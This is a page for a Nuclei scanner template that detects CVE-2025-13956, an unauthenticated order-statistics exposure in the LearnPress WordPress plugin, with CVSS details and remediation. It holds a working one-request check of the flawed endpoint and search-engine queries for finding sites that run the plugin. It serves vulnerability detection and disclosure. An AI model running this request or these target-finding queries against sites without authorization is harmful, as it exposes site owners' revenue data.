LearnPress < 4.3.2 - Broken Access Control

CVE-2025-13956

Verified

Description

The LearnPress – WordPress LMS Plugin plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the statistic function in all versions up to, and including, 4.3.1. This makes it possible for unauthenticated attackers to view the plugin's orders statistics, including total revenue summaries and order status counts.

Severity

Medium

CVSS Score

5.3

Exploit Probability

Affected Product

learnpress

Published Date

February 7, 2026

Template Author

pussycat0x

CVE-2025-13956.yaml

id: CVE-2025-13956

info:
  name: LearnPress < 4.3.2 - Broken Access Control
  author: pussycat0x
  severity: medium
  description: |
    The LearnPress – WordPress LMS Plugin plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the statistic function in all versions up to, and including, 4.3.1. This makes it possible for unauthenticated attackers to view the plugin's orders statistics, including total revenue summaries and order status counts.
  impact: |
    Unauthenticated attackers can view sensitive order statistics including revenue and order status, leading to information disclosure.
  remediation: |
    Update to a version later than 4.3.1 or the latest available version.
  reference:
    - https://wpscan.com/vulnerability/b4c0e309-45d1-4b00-875d-ec8a76910253/
    - https://nvd.nist.gov/vuln/detail/CVE-2025-13956
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2025-13956
    epss-score: 0.02788
    epss-percentile: 0.8626
    cwe-id: CWE-862
  metadata:
    verified: true
    max-request: 1
    vendor: thimpress
    product: learnpress
    framework: wordpress
    publicwww-query: "/wp-content/plugins/learnpress/"
    fofa-query: body="/wp-content/plugins/learnpress/"
    shodan-query: http.html:"/wp-content/plugins/learnpress/"
  tags: cve,cve2025,wordpress,wp-plugin,wp,learnpress,exposure

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-json/lp/v1/orders/statistic"

    matchers:
      - type: dsl
        dsl:
          - 'contains_any(body, "total-raised", "order-completed", "order-pending", "order-cancelled", "Total Raised")'
          - 'contains(body, "status\":\"success")'
          - 'contains(header, "application/json")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a00473045022100fa92e0221be64110986d566cbe378ead4788cb97505b9a929cb0daa82b9c477e02203ad95a5233b40fe6727be7314c2b8dfde57117e795fed55893497b5d354dc6b0:922c64590222798bb761d5b6d8e72950

5.3Score

CVSS Metrics

CVSS Vector:

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

CVE ID:

cve-2025-13956

CWE ID:

cwe-862

References

https://wpscan.com/vulnerability/b4c0e309-45d1-4b00-875d-ec8a76910253/https://nvd.nist.gov/vuln/detail/CVE-2025-13956

Remediation Steps

Update to a version later than 4.3.1 or the latest available version.

Description

id: CVE-2025-13956

info:
  name: LearnPress < 4.3.2 - Broken Access Control
  author: pussycat0x
  severity: medium
  description: |
    The LearnPress – WordPress LMS Plugin plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the statistic function in all versions up to, and including, 4.3.1. This makes it possible for unauthenticated attackers to view the plugin's orders statistics, including total revenue summaries and order status counts.
  impact: |
    Unauthenticated attackers can view sensitive order statistics including revenue and order status, leading to information disclosure.
  remediation: |
    Update to a version later than 4.3.1 or the latest available version.
  reference:
    - https://wpscan.com/vulnerability/b4c0e309-45d1-4b00-875d-ec8a76910253/
    - https://nvd.nist.gov/vuln/detail/CVE-2025-13956
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2025-13956
    epss-score: 0.02788
    epss-percentile: 0.8626
    cwe-id: CWE-862
  metadata:
    verified: true
    max-request: 1
    vendor: thimpress
    product: learnpress
    framework: wordpress
    publicwww-query: "/wp-content/plugins/learnpress/"
    fofa-query: body="/wp-content/plugins/learnpress/"
    shodan-query: http.html:"/wp-content/plugins/learnpress/"
  tags: cve,cve2025,wordpress,wp-plugin,wp,learnpress,exposure

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-json/lp/v1/orders/statistic"

    matchers:
      - type: dsl
        dsl:
          - 'contains_any(body, "total-raised", "order-completed", "order-pending", "order-cancelled", "Total Raised")'
          - 'contains(body, "status\":\"success")'
          - 'contains(header, "application/json")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a00473045022100fa92e0221be64110986d566cbe378ead4788cb97505b9a929cb0daa82b9c477e02203ad95a5233b40fe6727be7314c2b8dfde57117e795fed55893497b5d354dc6b0:922c64590222798bb761d5b6d8e72950

LearnPress < 4.3.2 - Broken Access Control

Description

Severity

CVSS Score

Exploit Probability

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps

LearnPress < 4.3.2 - Broken Access Control

Description

Severity

CVSS Score

Exploit Probability

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps